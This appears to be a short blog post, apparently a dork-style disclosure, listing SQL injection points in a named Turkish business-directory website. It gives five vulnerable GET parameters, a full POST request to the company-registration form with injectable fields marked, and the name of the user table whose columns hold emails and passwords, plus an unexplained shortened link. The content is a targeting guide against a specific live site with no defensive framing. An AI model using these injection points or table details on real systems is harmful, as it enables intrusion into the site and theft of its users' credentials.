Bug Type : Post&Normal SQL Injection
Vulnerable Files : -
----------------------
Normal SQL Injections;
?@=Firmam&ID=1'{1nj3ct10n)
?@=FirmaGruplar&Sektor=1'{1nj3ct10n)
?@=SeriIlanlarim&grup=1'{1nj3ct10n)
?@=Bilgim&ID=1'{1nj3ct10n)
?@=Bilgi&x=1'{1nj3ct10n)
-------------------------------
Post SQL Injection ;
http://istanbulesnaf.com/?@=FirmaKaydet
Host: istanbulesnaf.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://istanbulesnaf.com/?@=FirmaEkleyin&s=13
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
sektorum=13[INJECTABLE]&sektor=%3F%40%3DFirmaEkleyin%26s%3D13&grup=24[INJECTABLE]
important table and column names ;
Table Name : KULLANICILAR
Column Names : mail,sifre,kullanicie
http://activeation.com/AMoV
Hiç yorum yok:
Yorum Gönder